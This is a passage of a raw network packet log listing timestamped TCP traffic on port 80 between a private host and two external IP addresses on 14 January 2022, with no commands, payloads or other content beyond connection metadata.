Jan 14, 2022 00:16:09.450248957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.450258017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.450350046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.450474024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.450632095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.450675011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.450788021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.450865984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.451067924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.451080084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.451208115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.451289892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.451482058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.451692104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.451702118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.451801062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.451874018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.452029943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.452052116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.452156067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.452239990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.452579021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.452711105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.452790976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.452868938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.452946901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453072071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453147888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453233957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453310966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453389883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453469038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453547955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453629017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453780890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453792095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453888893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.453969002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454046965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454128027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454236984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454314947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454566002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454576969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454668045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454749107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454828024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454911947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.454989910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455113888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455195904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455264091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455354929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455513000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455523014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455600977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455677032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455833912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455843925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.455940008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456020117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456098080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456191063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456357002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456365108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456464052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456545115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456645966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456712961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456796885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456871986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.456954002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.469674110 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.469731092 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.469772100 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.469810009 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.469871998 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.469877005 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.469902992 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.469923973 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.469963074 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.469994068 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.470001936 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470042944 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470082045 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470101118 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.470124006 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470149040 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.470164061 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470201015 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470240116 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470276117 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.470278025 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470299006 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.470316887 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470356941 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470375061 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.470395088 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470433950 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470472097 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.470489979 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.470524073 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.510010004 CET	80	49904	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.510361910 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.510392904 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.510442019 CET	49904	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.510502100 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.510710001 CET	80	49910	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.510812998 CET	49910	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.510999918 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.511091948 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.511117935 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.511523962 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.512284994 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.512311935 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.513135910 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.513362885 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.514050961 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.514482975 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.515172958 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.516366959 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.516736984 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.516765118 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.517652988 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.518235922 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.518260002 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.518382072 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.522645950 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.522686005 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.522726059 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.522756100 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.522764921 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.522804022 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.522841930 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.522856951 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.522880077 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.522892952 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.522921085 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.522960901 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.522998095 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523014069 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523041010 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523046970 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523080111 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523119926 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523159027 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523173094 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523196936 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523205042 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523235083 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523273945 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523309946 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523338079 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523350954 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523364067 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523391008 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523426056 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523463964 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523478031 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523503065 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523518085 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523542881 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523581982 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523617983 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523633003 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523658037 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523664951 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523699045 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523736954 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523776054 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523789883 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523814917 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523824930 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523857117 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523895979 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523931980 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523947954 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.523971081 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.523991108 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.524009943 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.524045944 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.524082899 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.524099112 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.524123907 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.524137974 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.524163961 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.524219036 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.576596022 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.576653957 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.576695919 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.576736927 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.576741934 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.576776981 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.576792955 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.576818943 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.576853991 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.576893091 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.576925039 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.576932907 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.576971054 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577004910 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577008963 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577017069 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577049971 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577089071 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577097893 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577145100 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577182055 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577220917 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577223063 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577260971 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577267885 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577299118 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577337980 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577375889 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577389002 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577414036 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577440023 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577445030 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577445030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.577483892 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577507973 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577523947 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577562094 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577575922 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577600002 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577637911 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577682018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.577682018 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577693939 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577707052 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577745914 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577759027 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577785015 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577796936 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577825069 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577874899 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.577903032 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577903032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.577944040 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.577981949 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578023911 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578047037 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.578061104 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578083992 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.578100920 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578141928 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578178883 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578192949 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.578218937 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578227043 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.578257084 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578295946 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578335047 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578353882 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.578372002 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578380108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.578387976 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.578413010 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578450918 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578464985 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.578488111 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.578747988 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.578772068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.578977108 CET	49910	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.579003096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.579149961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.579245090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.579473972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.579576015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.579644918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.579746008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.579925060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.579941988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.580312014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.580327034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.580550909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.580696106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.580709934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.580864906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.580923080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.581017971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.581110954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.581199884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.581373930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.581384897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.581481934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.581619024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.581721067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.581826925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.581981897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582005024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582140923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582163095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582258940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582355976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582494020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582638025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582659960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582772017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582865953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.582969904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583061934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583168983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583189011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583278894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583374023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583465099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583559036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583642960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583733082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583825111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583901882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.583988905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584095955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584181070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584253073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584367990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584456921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584537983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584655046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584733009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584825993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584908009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.584990025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585089922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585175991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585257053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585339069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585418940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585527897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585608959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585685968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585773945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585858107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.585966110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.586049080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.586137056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.586219072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.586328983 CET	49902	80	192.168.2.4	185.215.113.35
